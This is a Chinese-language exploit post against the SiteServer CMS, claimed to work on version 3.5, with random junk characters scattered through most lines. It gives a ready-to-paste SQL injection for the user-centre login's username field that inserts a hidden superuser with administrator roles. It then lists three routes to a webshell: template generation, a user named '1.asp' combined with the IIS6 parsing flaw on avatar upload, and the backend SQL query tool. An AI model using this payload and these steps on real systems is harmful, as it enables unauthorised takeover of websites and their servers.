经测试秒杀最新的3.5版
5 Z. ^* H' T; U' ]stieserver官网:www.siteserver.cn u3 p/ [: [( E) d
EXP:$ Y8 S/ L Y) f* e0 U; k
直接访问UserCenter/login.aspx+ J9 x& k8 Z6 k8 k w
用户名处输入:; O' \8 s7 q0 F; {2 o+ |7 g/ ~0 ]3 _
0 h- q) x: ^% ?" U2 x$ V
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–! _ T Q" h3 t5 F. X
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。. a% I2 R. _ _# l" G" w' }) u
之后再访问后台SiteServer/login.aspx用插入的用户登陆
$ `- |3 \; y6 C9 a2 {8 N后台拿webshell的三种方法:
4 C* ^& i5 X; \5 y! h2 X) ~一、
$ J& m& {4 W' Z% l5 Q4 d站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
0 U5 f& ^. F4 z1 l8 \9 n3 W) k二、
. G5 V) v" X3 b; \: G& H4 ]成员权限-》添加用户-》用户名为:1.asp7 ?! Y3 ?8 u6 |$ f5 c
http://127.0.0.1/usercenter/
u" W8 `/ x1 H% I用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
: ~! p7 S$ H* B8 F# ^2 O(ps:后台添加用户时不会验证是否含有非法字符), _" `6 V/ a& K+ V% G) @ N" o
三、
4 p3 C% g) G. }* g( W1 T系统工具-》实用工具-》机器参数查看0 t% f* b6 c1 E
可以看到数据库类型、名称,WEB路径# s& A% H8 W6 Z( K0 {
系统工具-》数据库工具-》SQL语句查询2 G6 N& V+ C: s& L
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |